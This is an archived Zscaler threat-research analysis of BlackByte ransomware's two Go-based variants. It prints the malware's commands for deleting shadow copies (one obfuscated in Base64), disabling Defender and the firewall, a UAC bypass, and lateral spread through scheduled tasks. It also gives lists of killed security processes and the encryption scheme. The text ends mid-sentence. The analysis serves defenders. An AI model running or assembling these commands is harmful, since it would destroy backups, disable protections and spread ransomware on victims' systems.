{
	"id": "7d9c188d-adc0-4c25-b8a5-d96eba3007c5",
	"created_at": "2026-04-06T00:08:27.785898Z",
	"updated_at": "2026-04-10T03:32:24.838959Z",
	"deleted_at": null,
	"sha1_hash": "ddb360297952664ea21eeb89f768a4588d2d0625",
	"title": "Analyzing BlackByte Ransomware's Go-Based Variants | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4312083,
	"plain_text": "Analyzing BlackByte Ransomware's Go-Based Variants | Zscaler\r\nBy Javier Vicente Vallejo, Brett Stone-Gross\r\nPublished: 2022-05-03 · Archived: 2026-04-05 20:43:02 UTC\r\nKey Points\r\nBlackByte is a full-featured ransomware family that first emerged around July 2021\r\nThe ransomware was originally written in C# and later redeveloped in the Go programming language around\r\nSeptember 2021\r\nThe threat group exfiltrates data prior to deploying ransomware and leaks the stolen information if a ransom is not\r\npaid\r\nThe group has demanded multi-million dollar ransoms from some victims\r\nBlackByte ransomware employs various anti-analysis techniques including a multitude of dynamic string obfuscation\r\nalgorithms\r\nIn early versions of the ransomware, file encryption utilized a hardcoded 1,024-bit RSA public key along with a 128-bit AES key that was derived from a file retrieved from a command and control server\r\nMore recent BlackByte versions use Curve25519 Elliptic Curve Cryptography (ECC) for asymmetric encryption\r\nand ChaCha20 for symmetric file encryption\r\nIntroduction\r\nBlackByte is a Ransomware-as-a-Service (RaaS) group that has been targeting corporations worldwide since July 2021.\r\nPrevious versions of the ransomware were written in C#. More recently, the authors redeveloped the ransomware using the\r\nGo programming language. The BlackByte Go variant was used in attacks described in an FBI advisory that warned\r\nBlackByte had compromised numerous businesses, including entities in US critical infrastructure sectors. In this post,\r\nZscaler ThreatLabz analyzes two variants of the Go-based implementation of BlackByte ransomware.\r\nTechnical Analysis\r\nThreatLabz has identified two variants of the Go-based implementation of BlackByte. 
The first variant was seen in-the-wild around\r\nSeptember 2021 and shares many similarities with the C# version including the commands executed to perform lateral\r\npropagation, privilege escalation, and file encryption algorithms. A more recent Go-based variant was introduced around\r\nFebruary 2022. This new variant introduced many additional features and updated the file encryption algorithms. In this\r\nblog, for brevity, the Go-based BlackByte variant 1 will be referred to as BlackByte v1 and the second variant will be\r\nreferred to as BlackByte v2.\r\nInitialization\r\nBefore BlackByte performs file encryption, the ransomware first performs initialization. Most of these initialization\r\nfunctions are very similar or identical to the C# variant of BlackByte.\r\nMutex Creation\r\nBlackByte creates a mutex using a value that is hardcoded in the malware, for example: Global\\7b55551e-a59c-4252-a34a-5c80372b3014. If the mutex exists, BlackByte will terminate. This ensures that there is only one active instance of\r\nBlackByte running at a time.\r\nIdentify System Language\r\nBlackByte ransomware resolves the victim's system language by comparing the language ID values with those shown in\r\nTable 1. If the system language matches any from this list, BlackByte will exit without performing file encryption.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 1 of 21\n\nLanguage ID Language\r\n1049 Russian\r\n1058 Ukrainian\r\n1059 Belarusian\r\n1064 Tajik\r\n1067 Armenian\r\n1068 Azerbaijani Latin\r\n1079 Georgian\r\n1087 Kazakh\r\n1090 Turkmen\r\n1091 Uzbek Latin\r\n2092 Azerbaijani Cyrillic\r\n2115 Uzbek Cyrillic\r\nTable 1. System languages avoided by BlackByte ransomware\r\nThese languages are specifically avoided by BlackByte to prevent encrypting files on systems that are located in\r\nCommonwealth of Independent States (CIS) countries. 
This likely indicates that the threat actors behind BlackByte are\r\nlocated in Eastern Europe and/or Russia. This is designed to reduce the threat that local law enforcement in those regions\r\nwill pursue criminal prosecution against those responsible for BlackByte.\r\nEnable Long Paths\r\nThe malware executes the following command to avoid issues that may occur when encrypting files with long path names:\r\nC:\\WINDOWS\\system32\\cmd.exe /c reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\FileSystem /v LongPathsEnabled /t\r\nDisable Controlled Folder Access\r\nBlackByte executes the following command to disable controlled folder access:\r\nSet-MpPreference -EnableControlledFolderAccess Disabled\r\nThe Windows controlled folder access feature is designed to protect data from malicious applications such as ransomware.\r\nWhen enabled, files located in the specified protected folders cannot be modified by unauthorized applications.\r\nDelete Shadow Copies\r\nSimilar to other ransomware families, BlackByte deletes shadow copies to prevent a victim from easily recovering files from\r\nbackups. There are two methods that BlackByte uses to delete shadow copies. 
The first executes the following PowerShell\r\ncommand:\r\n$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagB\r\n'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+\r\n'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x\r\nThe Base64 string, when decoded, is the following: Get-WmiObject Win32_Shadowcopy | ForEach-Object\r\n{$_.Delete();}\r\nBlackByte also executes the following commands for each drive to delete shadow copies:\r\nC:\\WINDOWS\\system32\\cmd.exe /c vssadmin resize shadowstorage /for=: /on=: /maxsize=401MB\r\nC:\\WINDOWS\\system32\\cmd.exe /c vssadmin resize shadowstorage /for=: /on=: /maxsize=unbounded\r\nProcess Termination and Stop / Start Services\r\nThe following commands are executed by BlackByte to stop services that may hinder file encryption:\r\nC:\\WINDOWS\\system32\\sc.exe config SQLTELEMETRY start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config SQLTELEMETRY$ECWDB2 start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config SQLWriter start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config SstpSvc start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config MBAMService start= disabled\r\nC:\\WINDOWS\\system32\\sc.exe config wuauserv start= disabled\r\nBlackByte will also start the following services:\r\nC:\\WINDOWS\\system32\\sc.exe config Dnscache start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config fdPHost start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config FDResPub start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config SSDPSRV start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config upnphost start= auto\r\nC:\\WINDOWS\\system32\\sc.exe config RemoteRegistry start= auto\r\nBlackByte ransomware terminates the processes shown in Table 2 at the beginning of its execution:\r\nuranium processhacker procmon pestudio procmon64\r\nx32dbg x64dbg cffexplorer procexp64 procexp\r\npslist tcpview tcpvcon dbgview rammap\r\nrammap64 vmmap 
ollydbg autoruns autorunsc\r\nregmon idaq idaq64 immunitydebugger wireshark\r\ndumpcap hookexplorer importrec petools lordpe\r\nsysinspector proc_analyzer sysanalyzer sniff_hit windbg\r\njoeboxcontrol joeboxserver joeboxserver resourcehacker fiddler\r\nhttpdebugger dumpit rammap rammap64 vmmap\r\nagntsvc cntaosmgr dbeng50 dbsnmp encsvc\r\nexcel firefox firefoxconfig infopath isqlplussvc\r\nmbamtray msaccess msftesql mspub mydesktopqos\r\nmydesktopservice mysqld mysqld-nt mysqld-opt Ntrtscan\r\nocautoupds ocomm ocssd onenote oracle\r\noutlook PccNTMon powerpnt sqbcoreservice sql\r\nsqlagent sqlbrowser sqlservr sqlwriter steam\r\nsynctime tbirdconfig thebat thebat64 thunderbird\r\ntmlisten visio winword wordpad xfssvccon\r\nzoolz filemon nsservice nsctrl  \r\nTable 2. Process names terminated by BlackByte ransomware\r\nMany of these process names are related to business applications. BlackByte kills these processes to avoid open file handle\r\npermission issues when performing file encryption of the victim's files. 
In addition, the list contains a large number of\r\nmalware analyst tools that can be used to reverse engineer the functionality of the ransomware.\r\nBlackByte also terminates the following services that are associated with antivirus products, backup software, and business\r\napplications including financial software, email clients, and databases as shown below in Table 3.\r\nklvssbridge64 vapiendpoint ShMonitor Smcinst SmcService\r\nSntpService svcGenericHost swi_ TmCCSF tmlisten\r\nTrueKey TrueKeyScheduler TrueKeyServiceHelper WRSVC McTaskManag\r\nOracleClientCache80 mfefire wbengine mfemms RESvc\r\nmfevtp sacsvr SAVAdminService SAVService SepMasterServ\r\nPDVFSService ESHASRV SDRSVC FA_Scheduler KAVFS\r\nKAVFSGT kavfsslp klnagent macmnsvc masvc\r\nMBAMService MBEndpointAgent McShield audioendpointbuilder Antivirus\r\nAVP DCAgent bedbg EhttpSrv MMS\r\nekrn EPSecurityService EPUpdateService ntrtscan EsgShKernel\r\nmsexchangeadtopology AcrSch2Svc MSOLAP$TPSAMA Intel(R) PROSet Monitoring msexchangeim\r\nARSM unistoresvc_1af40a ReportServer$TPS MSOLAP$SYSTEM_BGC W3Svc\r\nMSExchangeSRS ReportServer$TPSAMA Zoolz 2 Service MSOLAP$TPS aphidmonitors\r\nSstpSvc MSExchangeMTA ReportServer$SYSTEM_BGC Symantec System Recovery UI0Detect\r\nMSExchangeSA MSExchangeIS ReportServer MsDtsServer110 POP3Svc\r\nMSExchangeMGMT SMTPSvc MsDtsServer IisAdmin MSExchangeE\r\nEraserSvc11710 Enterprise Client Service MsDtsServer100 NetMsmqActivator stc_raw_agent\r\nVSNAPVSS PDVFSService AcrSch2Svc Acronis CASAD2DWe\r\nCAARCUpdateSvc McAfee avpsus DLPAgentService mfewc\r\nBMR Boot Service DefWatch ccEvtMgr ccSetMgr SavRoam\r\nRTVscan QBFCService QBIDPService Intuit.QuickBooks.FCS QBCFMonitor\r\nYooIT zhudongfangyu nsService veeam backup\r\nsql memtas vss sophos svc$\r\nmepocs wuauserv      \r\nTable 3. 
Service names terminated by BlackByte ransomware\r\nWindows Firewall\r\nBlackByte disables the Windows firewall via the command: \r\nnetsh advfirewall set allprofiles state off\r\nWindows Defender\r\nThe ransomware executes the following command to delete Task Manager and Resource Monitor, and to stop the Windows Defender\r\nservice:\r\ncmd /c del C:\\Windows\\System32\\Taskmgr.exe /f /q \u0026 del C:\\Windows\\System32\\resmon.exe /f /q \u0026\r\npowershell -command \"$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String\r\n('V'+'wBp'+'A'+'G4AR'+'AB'+'lAG'+'YAZQBuAGQA'));Stop-Service -Name $x;Set-Service -StartupType Disabled \r\nThe Base64 encoded string above decodes to WinDefend.\r\nRaccine Anti-Ransomware\r\nBlackByte terminates and uninstalls an anti-ransomware product known as Raccine. The Raccine processes that are\r\nterminated are raccine.exe and raccinesettings.exe. To uninstall Raccine, BlackByte deletes the following registry keys and\r\nvalues:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Raccine Tray\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\Raccine\r\nHKEY_CURRENT_USER\\SOFTWARE\\Raccine\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Raccine\r\nBlackByte then deletes Raccine's scheduled task via the command:\r\nC:\\WINDOWS\\system32\\schtasks.exe /DELETE /TN \"\\\"Raccine Rules Updater\\\"\" /F\r\nPrivilege Escalation\r\nThe ransomware executes the following commands to disable UAC remote restrictions:\r\nC:\\WINDOWS\\system32\\cmd.exe /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v Local\r\nBlackByte sets the EnableLinkedConnections registry value to force symbolic links to be written to link logon sessions as\r\nfollows:\r\nC:\\WINDOWS\\system32\\cmd.exe /c reg add 
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v Enabl\r\nIn BlackByte v2, an additional privilege escalation method was added that exploits the CMSTPLUA COM interface to\r\nbypass UAC. The ShellExec method of the interface ICMLuaUtil can be invoked with arbitrary commands with elevated\r\nprivileges using the ElevationMoniker Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.\r\nThis allows BlackByte v2 to execute the svchost.exe process that it injects into with elevated privileges. This privilege\r\nescalation technique has also been utilized by other ransomware groups including REvil and LockBit.\r\nLateral Propagation\r\nBlackByte ransomware performs network enumeration and can propagate across a local network. First, it executes the\r\nfollowing commands to enable network discovery and file and printer sharing:\r\nC:\\WINDOWS\\system32\\cmd.exe /c netsh advfirewall firewall set rule \"group=\\\"Network Discovery\\\"\" new enable=Ye\r\nC:\\WINDOWS\\system32\\cmd.exe /c netsh advfirewall firewall set rule \"group=\\\"File and Printer Sharing\\\"\" new en\r\nThe following commands are then executed to discover other computers and network file shares:\r\nnet view\r\narp -a\r\nBlackByte loads the Active Directory module RSAT-AD-PowerShell and queries for other computers via the following\r\ncommands:\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Install-WindowsFeature -Name \\\"RSAT-AD-PowerShell\\\"\r\npowershell -command \"Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name\"\r\nIf the -a flag is passed via the command-line, BlackByte attempts to copy itself to remote computers' public folders via the\r\nadministrative share \\\\\\c$\\Users\\Public\\. 
If that attempt is unsuccessful, BlackByte will default to the path: \\\\\\Users\\Public\\.\r\nBlackByte uses the Windows task scheduler to execute the ransomware on the remote host using the following command:\r\nC:\\Windows\\system32\\schtasks.exe /Create /S /TN /TR \"C:\\Users\\Public\\ -s \" /ru SYSTEM /sc onlogon /RL HIGHES\r\nIn BlackByte v2, the filename and task name are pseudorandomly generated using a function that produces eight upper and\r\nlowercase alphabetic and numeric characters (e.g., BqgDOVYL.exe and KYL8EpE9, respectively). BlackByte v1 uses a\r\nhardcoded filename and command-line argument complex.exe -single and the hardcoded task name asd.\r\nAfter scheduling the task, the remote BlackByte binary is executed using the command:\r\nC:\\Windows\\system32\\schtasks.exe /S /Run /TN\r\nAfter the task is executed, BlackByte deletes the remote task using the command:\r\nC:\\Windows\\system32\\schtasks.exe /Delete /S /TN /f\r\nBlackByte then deletes the copy of itself on the remote host network share. BlackByte also attempts to access administrative\r\nshares A$ through Z$ and the folders shown in Table 4.\r\nUsers Backup Veeam Consejo homes\r\nhome media common Storage Server Public\r\nWeb Images Downloads BackupData ActiveBackupForBusiness\r\nBackups NAS-DC DCBACKUP DirectorFiles share\r\nTable 4. Network shares targeted by BlackByte ransomware\r\nCheck for Analysis Tools\r\nThe malware checks the following DLL modules in memory shown in Table 5 and exits if they are present:\r\nDLL Filename Description\r\nDBGHELP.DLL Windows DbgHelp Library\r\nSbieDll.dll Sandboxie\r\nSxIn.dll Qihu 360 Total Security\r\nSf2.dll Avast Antivirus\r\nsnxhk.dll Avast Antivirus\r\ncmdvrt32.dll COMODO Internet Security\r\nTable 5. 
DLLs identified by BlackByte ransomware\r\nDisable Debugging\r\nBlackByte attempts to prevent debugging tools from monitoring and attaching to various processes by removing the\r\nfollowing registry values under SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options:\r\nvssadmin.exe\r\nwbadmin.exe\r\nbcdedit.exe\r\npowershell.exe\r\ndiskshadow.exe\r\nnet.exe\r\ntaskkill.exe\r\nwmic.exe\r\nfsutil.exe\r\nProcess Injection\r\nBlackByte v1 injects the ransomware code in an instance of regedit.exe, while BlackByte v2 injects itself into an instance of\r\nsvchost.exe. After the process is injected with the ransomware code, the file encryption is then performed in the context of\r\nthe regedit.exe or svchost.exe process. BlackByte then deletes its original binary on disk by executing the command:\r\nC:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 10 \u003e Nul \u0026 Del /F /Q\r\nThe ping command is used to delay the file deletion by 10 seconds. 
The process injection functionality may be able to\r\nbypass some security software detections.\r\nUnmount Virtual Machine Images\r\nIn order to identify virtual machines on the victim's system, BlackByte will execute the command:\r\npowershell Get-VM\r\nIf any virtual machine files are located, BlackByte will attempt to unmount the image by executing the following command\r\nline:\r\npowershell.exe Dismount-DiskImage -ImagePath\r\nBackup Volumes\r\nThe malware executes mountvol.exe to try to mount additional volumes:\r\nC:\\WINDOWS\\system32\\mountvol.exe A: \\\\?\\Volume{[GUID]}\\\r\nC:\\WINDOWS\\system32\\mountvol.exe B: \\\\?\\Volume{[GUID]}\\\r\nC:\\WINDOWS\\system32\\mountvol.exe E: \\\\?\\Volume{[GUID]}\\\r\nC:\\WINDOWS\\system32\\mountvol.exe F: \\\\?\\Volume{[GUID]}\\\r\nThis is likely an attempt to mount and encrypt backup volumes to further prevent file recovery after encryption.\r\nFile Encryption\r\nBlackByte enumerates all physical drives and network shares skipping files that contain the following substrings in Table 6:\r\nblackbyte ntdetect.com bootnxt ntldr recycle.bin\r\nbootmgr thumbs.db ntuser.dat bootsect.bak autoexec.bat\r\niconcache.db bootfont.bin      \r\nTable 6. BlackByte ransomware file substring filter list\r\nBlackByte avoids the following extensions shown in Table 7.\r\nurl msilog log ldf lock\r\ntheme msi sys wpx cpl\r\nadv msc scr key ico\r\ndll hta deskthemepack nomedia msu\r\nrtp msp idx ani 386\r\ndiagcfg bin mod ics com\r\nhlp spl nls cab exe\r\ndiagpkg icl ocx rom prf\r\nthemepack msstyles icns mpa drv\r\ncur diagcab cmd shs  \r\nTable 7. 
File extensions skipped by BlackByte ransomware\r\nBlackByte will also skip files located in the following directories shown in Table 8.\r\nbitdefender trend micro avast software intel common files\r\nprogramdata windowsapps appdata mozilla application data\r\ngoogle windows.old system volume information program files (x86) boot\r\ntor browser windows intel perflogs msocache\r\nTable 8. Directories whitelisted by BlackByte ransomware\r\nBlackByte optimizes encryption speed based on the targeted file size according to the following rules:\r\nFile Size Encryption Rule\r\nSize \u003c= 5MB Encrypt the entire file\r\n15MB \u003e= Size \u003e 5MB Encrypt the first 1MB and last 1MB\r\n150MB \u003e= Size \u003e 15MB Encrypt the first 5MB and last 5MB\r\nSize \u003e 150MB Encrypt the first 50MB and last 50MB\r\nBlackByte renames encrypted files with the extension .blackbyte. The ransomware creates a DefaultIcon registry key under\r\nHKEY_CLASSES_ROOT\\.blackbyte that points to an icon file, so that every file that is encrypted will show this icon in\r\nWindows Explorer. In addition, the registry values s1159 and s2359 are set to BLACKBYTE under\r\nHKEY_CURRENT_USER\\Control Panel\\International. These registry values control the time format for AM/PM. As a\r\nresult, Windows will show BLACKBYTE instead of AM/PM as shown below in Figure 2.\r\nFigure 2. BlackByte AM/PM time format modification\r\nThis time format modification is performed by executing the commands:\r\nreg add \"HKCU\\Control Panel\\International\" /v s1159 /t REG_SZ /d BLACKBYTE /f\r\nreg add \"HKCU\\Control Panel\\International\" /v s2359 /t REG_SZ /d BLACKBYTE /f\r\nFile Encryption Algorithms (Variant 1)\r\nBlackByte v1 must be executed with the command line argument -single followed by a SHA256 hash. 
This hash is\r\ncombined with a TOR onion URL (e.g., hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad[.]onion/).\r\nThe SHA256 hash given as an argument is concatenated to the onion URL to build the URL of the victim ransom portal that\r\nis embedded in the ransom note. This URL is substituted in the [LINK] field of the ransom note template.\r\nWhen BlackByte v1 is executed, the malware tries to connect to a hardcoded URL that hosts a file that is involved in the\r\nconstruction of an AES key that is used to encrypt a victim's files. An example URL used for this purpose\r\nwas hxxps://185.93.6[.]31/mountain.png. The mechanism used to build the AES key is very similar to the C# variant.\r\nAfter the content of the file mountain.png is downloaded, BlackByte reads the first 16 bytes of the file into a buffer and 24\r\nbytes at the offset 0x410 of the file into another buffer. These 24 bytes are used as the key to create and initialize a\r\nNewTripleDESCipher object from the Go Cryptographic API. This object is used to decrypt the first 16 bytes of the file\r\nmountain.png. The resulting 16-byte buffer will be used as a PBKDF2 password to derive the AES key that will be used to\r\nencrypt the victim's files. The BlackByte PBKDF2 algorithm uses SHA1 as the hashing function and 1,000 iterations to\r\nderive the AES key. The password is converted to unicode and the unicode string BLACKBYTE_IS_COOL is used as the\r\nsalt. The following example Python code can be used to derive the AES key used for file encryption.\r\nFigure 3. Python code to decrypt BlackByte v1 files with the file (e.g., mountain.png) downloaded from the C2 server\r\nVictims' files are encrypted with AES using CBC mode. The first 16 bytes of the PBKDF2 derived key are used as the AES key,\r\nand the same 16 bytes are used as the initialization vector (IV). 
The same AES key is used to encrypt all the files on a\r\nvictim's machine.\r\nThe PBKDF2 password is encrypted with a hardcoded 1,024-bit RSA public key and the resulting RSA-encrypted value is\r\nencoded with Base64. This Base64 encoded string is substituted in the [KEY] field in the ransom note template. The threat\r\nactor can decrypt the PBKDF2 password with their corresponding RSA private key, derive the AES key, and thereafter,\r\ndecrypt the victim's encrypted files. The following is an example RSA public key that was hardcoded in BlackByte:\r\n-----BEGIN PUBLIC KEY-----\r\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUBwECQuQiVGorPYvHrJM11OWV\r\nE1PS8gaBqIAfPaR1rQHUEXu3iX/da/dCtV8Z27/SIA/ZYUNhTyUsX9Snjz8zve90\r\nQAiG1c/BS81WWRax7M7i1rESStVwOaUDAj5w6cz9GwDMGYI+wve9Qyjtw5R6hr5I\r\nqlIEig1Wy1X27vUC2wIDAQAB\r\n-----END PUBLIC KEY-----\r\nRansom Note and BlackByte Icon (Variant 1)\r\nThe BlackByte ransom note and an image containing an icon file are stored as Base64 encoded strings in the binary. After\r\nthe encryption of the victim's files, the ransom note is written to a file named BlackByteRestore.txt, and the previously\r\nmentioned icon file is written to a file named BB.ico. An example BlackByte v1 ransom note template is shown below in\r\nFigure 4. The BlackByte logo uses the extended ASCII characters of the 8-bit code page 437 to create 3-D block letters.\r\nFigure 4. Go-based BlackByte v1 ransom note template\r\nFile Encryption Algorithms (Variant 2)\r\nThe second variant of BlackByte ransomware does not require a network connection to start encryption. In addition, the\r\nransomware's command-line parameters were modified. BlackByte v2 requires two command line parameters:\r\nsample.exe\r\nThe first parameter is a flag (e.g., -a) that controls specific behaviors of the ransomware (e.g., to propagate across a\r\nnetwork), while the second parameter is a passphrase (e.g., 54726956) that is verified before file encryption commences. 
If\r\nBlackByte is not provided with any command-line arguments, the ransomware prints out the phrase BlackByte ransomware,\r\n8-th generation, the most destructive of all ransomware products, real natural disaster. and exits.\r\nBlackByte v2 removed the RSA and AES file encryption algorithms from the ransomware. The encryption algorithms were\r\nreplaced with Curve25519 elliptic curve cryptography for asymmetric encryption and ChaCha20 as the symmetric algorithm. The\r\nCurve25519 functions are statically compiled within BlackByte using Go library code. BlackByte generates a random 32-byte buffer per file using the Windows API function RtlGenRandom(). This random value is used as a file's secret key. The\r\nfile's public key is calculated as follows:\r\nfile_public_key = Curve25519(file_secret_key, base_point = 0x9)\r\nThe threat actor's Curve25519 public key is hardcoded in the binary and stored as a Base64 encoded string. For the sample\r\nwith the SHA256 hash ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa, the hardcoded\r\nCurve25519 public key was the string:\r\n2BSTzcpdqRW/a2DRT3TiL9lN5INRmmn1lCQWzZhkfQs=\r\n(d81493cdca5da915bf6b60d14f74e22fd94de483519a69f5942416cd98647d0b)\r\nThe shared secret is derived as follows:\r\nshared_secret = Curve25519(file_secret_key, blackbyte_public_key)\r\nThe shared secret is hashed with SHA256 to derive a 32-byte ChaCha encryption key. The ChaCha encryption key is then\r\nhashed again with SHA256 to derive the ChaCha nonce (using 12 bytes starting at offset 10). Once the ChaCha key\r\nparameters have been derived, they will be used to encrypt the file's content. The encrypted data is written to the file\r\n(overwriting the original content). Finally, the victim's 32-byte public key is concatenated to the encrypted content of the\r\nfile. 
The BlackByte v2 encryption algorithm is shown below in Figure 5.\r\nFigure 5. BlackByte v2 file encryption algorithm\r\nThe threat actor can use the file's public key together with the threat actor's secret key to recover the shared secret and use it\r\nto decrypt the encrypted data as follows:\r\nshared_secret = Curve25519(blackbyte_secret_key, file_public_key)\r\nThe following Python code in Figure 6 can be used to decrypt BlackByte encrypted data from a file that has been encrypted\r\nif the threat actor's private key is obtained:\r\nFigure 6. Python code to decrypt BlackByte v2 files with the threat actor's private key\r\nBlackByte v2 also encrypts the filename after encryption. The encryption is a simple XOR layer with a hardcoded key,\r\nfollowed by Base64 encoding as shown in Figure 7.\r\nFigure 7. BlackByte v2 filename encryption\r\nIn the analyzed sample, the XOR key was fuckyou123. After a filename has been encrypted, the file is renamed and the\r\n.blackbyte extension is concatenated.\r\nThreatLabz has implemented proof-of-concept file decryption code for both BlackByte v1 and v2 here.\r\nRansom Note and BlackByte Icon (Variant 2)\r\nBlackByte v2 introduced some improvements to storing the ransom note and icon file. The Base64 encoded blocks for the\r\nransom note and icon file added an XOR-based encryption layer. The XOR key to decrypt the ransom note and icon file is\r\nembedded in the ransomware as an obfuscated string. 
The icon file is written to the victim's %APPDATA% directory using a\r\nrandomly generated filename consisting of six upper and lowercase alphabetic and numeric characters (e.g., i2uOJh.ico).\r\nBlackByte v2 contains a hardcoded TOR onion URL and path for the victim portal rather than relying on the command-line\r\nfor the path value. BlackByte v2 also added a hardcoded password that is required to access the victim ransom portal. An\r\nexample password is:\r\ngkaW_#DD[Aw_JTB@luXpJBdye6eLr@{bx5pHFA)T5FpMYJC]f|@\r\nThe BlackByte v2 ransom note template is shown below in Figure 8. The [LINK] substring in the ransom note is replaced\r\nwith the hardcoded BlackByte victim URL and the [PASSW] substring is replaced with the victim-specific password for the\r\nransom portal.\r\nFigure 8. BlackByte v2 ransom note template\r\nAn example ransom note when populated after file encryption has been performed for BlackByte v2 is shown in Figure 9.\r\nFigure 9. BlackByte v2 ransom note\r\nA copy of the BlackByte v2 ransom note can be found in the ThreatLabz GitHub repository. After BlackByte encrypts files,\r\nthe ransom note is written to each directory, the encrypted files are renamed, and their icons are replaced by the BlackByte\r\nicon.\r\nRansom Portal and Leak Site\r\nWhen a victim accesses the link in the ransom portal, they are instructed to enter the access key from the ransom note as\r\nshown in Figure 10.\r\nFigure 10. BlackByte victim ransom portal\r\nAfter a victim authenticates, they are provided the ransom demand and instructions on how to purchase Bitcoin. There is also a\r\nlive chat feature as shown in Figure 11.\r\nFigure 11. 
BlackByte ransom negotiation portal\r\nVictims are further pressured to pay the ransom, or risk having their data publicly leaked on the group's TOR hidden service as\r\nshown in Figure 12.\r\nFigure 12. BlackByte victim leak site\r\nPrint Bombing\r\nIn addition to dropping a ransom note on the victim's machine, the ransomware sends a message to be printed by any\r\nconnected printers. The printed ransom message is an RTF file with the content shown below:\r\n{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}\r\n{\\*\\generator Riched20 10.0.19041}\\viewkind4\\uc1\r\n\\pard\\sa200\\sl276\\slmult1\\qc\\f0\\fs56\\lang9 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\fs56 Your HACKED by BlackByte team.\\par\r\nConnect us to restore your system.\\fs22\\par\r\n\\pard\\sa200\\sl276\\slmult1\\par\r\n}\r\nIn BlackByte v1, the message is written to the file C:\\Users\\tree.dll and the following command is executed to print it:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c for /l %x in (1,1 ,75) do start wordpad.exe /p C:\\\\Users\\\\tree.dll\r\nIn addition, a task named Task is created to print the message every hour:\r\nC:\\WINDOWS\\system32\\schtasks.exe /create /np /sc HOURLY /tn Task /tr \"C:\\Windows\\System32\\cmd.exe\r\n/c for /l %x in (1,1,75) do start wordpad.exe /p C:\\Users\\tree.dll\" /st 07:00\r\nIn BlackByte v2, the text of the message is written to a file with a random name consisting of 
six upper and lowercase alphabetic and numeric characters. The task name is also randomly generated, consisting of eight upper and lowercase alphabetic and numeric characters. An example task command to print the ransom message is shown below:\r\nC:\\WINDOWS\\system32\\schtasks.exe /create /np /sc HOURLY /tn 4y77VPNo /tr \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,75) do start %SystemDrive%\\Program Files\\Windows NT\\Accessories\\WordPad.exe /p C:\\Users\\1HoWkK.dll\" /st 07:00\r\nAnti-Analysis / Anti-Forensics Techniques\r\nString Obfuscation\r\nBoth Go-based BlackByte variants encrypt most strings using a tool similar to AdvObfuscator. Each string is decrypted using a unique algorithm with polymorphic code that implements different operations (XOR, addition, subtraction, etc.). In the examples in Figure 13, the encrypted strings are built and decrypted from arguments on the stack.\r\nFigure 13. BlackByte string obfuscation examples\r\nModified UPX Packer\r\nIn addition to string obfuscation, BlackByte samples are typically packed with UPX. In BlackByte v1, all of the samples observed by ThreatLabz were packed with the standard UPX packer and could be unpacked via the command-line parameter -d. The early samples of BlackByte v2 were also packed with the standard UPX packer. However, the most recent BlackByte samples (since March 2022) are packed with a modified version of UPX. The section names have been renamed from UPX0 and UPX1 to BB0 and BB1, respectively. Figure 14 shows an example BlackByte v2 sample with the modified UPX headers.\r\nFigure 14. 
BlackByte v2 altered UPX header\r\nAntivirus Detection\r\nDue to BlackByte's anti-analysis features, polymorphic code, and heavy obfuscation, many antivirus products have very low detection rates. For example, the BlackByte sample with the SHA256 534f5fbb7669803812781e43c30083e9197d03f97f0d860ae7d9a59c0484ace4 has an antivirus detection rate of 4/61 at the time of publication.\r\nConclusion\r\nBlackByte is a full-featured ransomware family operated by a threat group that continues to breach organizations and demand large ransom amounts. The threat group also performs double extortion attacks by stealing an organization's files and leaking them online if the ransom is not paid. The ransomware code itself is regularly updated to fix bugs, bypass security software, and hinder malware analysis. The encryption algorithms have also been improved to be more secure and prevent file recovery. This demonstrates that the threat group will likely continue to improve the ransomware and remain a significant threat to organizations.\r\nCloud Sandbox Detection\r\nZscaler's multilayered cloud security platform detects indicators at various levels, as shown 